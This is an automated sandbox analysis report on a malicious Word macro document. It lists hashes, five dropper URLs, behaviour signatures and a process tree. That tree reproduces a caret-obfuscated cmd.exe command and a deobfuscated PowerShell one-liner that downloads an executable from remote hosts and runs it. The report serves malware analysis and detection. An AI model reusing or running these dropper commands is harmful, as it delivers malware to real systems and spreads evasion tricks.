Analysis

  • max time kernel
    139s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    31-07-2022 09:13

General

  • Target

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc

  • Size

    112KB

  • MD5

    bb7ac1a1873e29db1f7ad69aaf4a8127

  • SHA1

    e7a082ff41d8cc4a09d3f852c46cfb808659b476

  • SHA256

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • SHA512

    9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://solvolab.com/sdB

exe.dropper

http://kenstones.com/pR

exe.dropper

http://benvisuals.com/S2hMkKS

exe.dropper

http://www.clinicacirurgiaplasticasp.com.br/Jmz

exe.dropper

http://pride.ge/0e40iT

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1944
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^$(^hc^a^er^o^f^;'^e^x^e^.^'+^p^JH^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$=^E^z^l^$^;^'^2^3^4^'^ ^=^ ^p^J^H^$^;)^'^@^'(^t^i^l^p^S^.'^T^i0^4^e^0/e^g^.^e^d^irp//^:^p^t^t^h^@^z^m^J/r^b^.^m^oc^.^p^s^ac^i^t^s^a^l^p^a^i^gr^ur^ic^acin^i^lc^.^w^w^w//^:^p^t^t^h^@^S^Kk^M^h2^S/^m^oc^.^s^l^a^us^ivn^e^b//^:^p^t^t^h^@R^p/^moc.^s^en^o^t^sn^e^k//^:^p^t^t^h^@^B^d^s/^moc^.^b^a^l^ov^lo^s//^:p^t^t^h^'=Cr^b^$;^tn^e^i^lC^b^e^W^.^t^eN^ ^tce^j^b^o^-^w^en^=^pr^Y^$^ ^l^l^e^h^sr^ewo^p&&^f^or /^L %^P ^in (^3^5^8^,^-^1,^0)^d^o ^s^e^t sX=!sX!!^x^i^U^5:~%^P,1!&&^i^f %^P=^=^0 c^a^l^l %sX:^~^4%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $Yrp=new-object Net.WebClient;$brC='http://solvolab.com/sdB@http://kenstones.com/pR@http://benvisuals.com/S2hMkKS@http://www.clinicacirurgiaplasticasp.com.br/Jmz@http://pride.ge/0e40iT'.Split('@');$HJp = '432';$lzE=$env:public+'\'+$HJp+'.exe';foreach($LQA in $brC){try{$Yrp.DownloadFile($LQA, $lzE);Invoke-Item $lzE;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1356

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/560-62-0x00000000007A3000-0x00000000007A7000-memory.dmp

      Filesize

      16KB

    • memory/560-58-0x0000000076681000-0x0000000076683000-memory.dmp

      Filesize

      8KB

    • memory/560-54-0x0000000072AD1000-0x0000000072AD4000-memory.dmp

      Filesize

      12KB

    • memory/560-57-0x000000007153D000-0x0000000071548000-memory.dmp

      Filesize

      44KB

    • memory/560-63-0x00000000007A3000-0x00000000007A7000-memory.dmp

      Filesize

      16KB

    • memory/560-59-0x000000007153D000-0x0000000071548000-memory.dmp

      Filesize

      44KB

    • memory/560-92-0x000000007153D000-0x0000000071548000-memory.dmp

      Filesize

      44KB

    • memory/560-55-0x0000000070551000-0x0000000070553000-memory.dmp

      Filesize

      8KB

    • memory/560-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1356-89-0x000000006B090000-0x000000006B63B000-memory.dmp

      Filesize

      5.7MB

    • memory/1356-90-0x0000000004B80000-0x00000000051D1000-memory.dmp

      Filesize

      6.3MB

    • memory/1356-91-0x000000006B090000-0x000000006B63B000-memory.dmp

      Filesize

      5.7MB

    • memory/1356-93-0x000000006B090000-0x000000006B63B000-memory.dmp

      Filesize

      5.7MB

    • memory/1944-61-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp

      Filesize

      8KB